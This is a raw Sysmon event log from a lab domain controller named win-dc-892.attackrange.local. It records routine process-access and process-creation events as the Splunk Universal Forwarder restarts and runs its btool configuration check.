12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-64EA-6064-CA00-00000000AE01}65366528C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.812{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000008024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-64EA-6064-C900-00000000AE01}51805204C:\Windows\system32\cmd.exe{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.804{266CAFBE-64EA-6064-CA00-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000008016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.797{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.799{266CAFBE-64EA-6064-C900-00000000AE01}5180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 10341000x80000000000000008008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.766{266CAFBE-64EA-6064-C800-00000000AE01}46324612C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:50.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.486{266CAFBE-64EA-6064-C700-00000000AE01}70367040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EA-6064-C800-00000000AE01}4632C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 